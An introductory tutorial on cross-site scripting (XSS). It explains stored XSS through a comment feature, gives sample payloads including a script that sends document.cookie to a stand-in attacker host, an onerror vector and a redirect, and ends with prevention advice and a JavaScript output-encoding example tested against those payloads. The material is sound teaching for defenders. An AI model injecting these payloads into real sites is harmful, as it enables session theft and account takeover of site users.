XSS stands for Cross-Site Scripting; it is abbreviated XSS rather than CSS to distinguish it from Cascading Style Sheets. The core principle of XSS is to get malicious JavaScript executed in the target page.
Take a common example: website A has a user comment feature. Assuming website A takes no measures to prevent XSS, an attacker can submit the following content as a comment:
```html
<script>
  const cookie = document.cookie;
  // Ajax sends the cookie to the attacker's own server (pseudocode)
  Ajax('http://attacker.com', cookie);
</script>
```
Website A saves the content to its server and displays it on the comment page. When user A then visits that page, user A's browser recognizes the <script> tag and simply executes the code inside it. Since website A's login credentials are all kept in cookies, the attacker can now log in to website A as user A.
Attack modes of XSS
In addition to the <script> tag shown above, other tags and their event handlers can carry the payload, for example:
```html
<img src="" onerror='alert("hey!")'>
<a onmousemove='do something here'>
```
Attack intentions of XSS
- Steal the cookie values of the target web page. The server can mark cookies as HttpOnly so that page scripts cannot read them (browser support is required; after all, the cookie ultimately belongs to the browser).
- Hijack traffic by redirecting users to another site. Inserting code like the following:
```html
<script>window.location.href="http://www.baidu.com";</script>
```
effectively steals traffic from the target site.
Precautions
- Filter tags such as <script>, <img> and <a>.
- Escape and encode the content uploaded by users, so that the browser does not interpret it as markup while the displayed text is unaffected.
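As an added example (not code from the original post), the encoding precaution in JavaScript: user comment text is HTML-entity encoded at the point where it is written into the page, and the sample comments are constructed from the payloads discussed above.

```javascript
// Added example (not the original post's code): HTML output encoding for
// user-supplied comment text, the "escape and encode" precaution above.
// The five characters that can open a tag, close an attribute or start an
// entity are replaced by their HTML entities, so the browser displays them
// as text instead of parsing them as markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Encode when building the HTML (output), not only when accepting input:
// stored data may reach the template from other paths, and input filters
// are easy to bypass with encodings they did not anticipate. This encoder is
// for HTML text and quoted attribute values; URL and inline-JavaScript
// contexts need their own context-specific encoders.
function renderComment(author, body) {
  return `<li><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

// Constructed sample comments echoing the payloads discussed on this page.
const SAMPLE_COMMENTS = [
  ["alice", "Great article, thanks!"],
  ["mallory", "<script>Ajax('http://attacker.com', document.cookie)</script>"],
  ["mallory", "<img src=\"\" onerror='alert(\"hey!\")'>"],
  ["mallory", '<script>window.location.href="http://www.baidu.com";</script>'],
];

// Regression check for the template layer: the only tags present in the
// rendered output must be the ones the template itself emits.
function onlyTemplateTags(html) {
  const tags = html.match(/<\/?[a-z][^>]*>/gi) || [];
  return tags.every((t) => ["<li>", "</li>", "<b>", "</b>"].includes(t));
}

function renderAll(comments) {
  return comments.map(([author, body]) => renderComment(author, body));
}

console.log(renderAll(SAMPLE_COMMENTS).join("\n"));
```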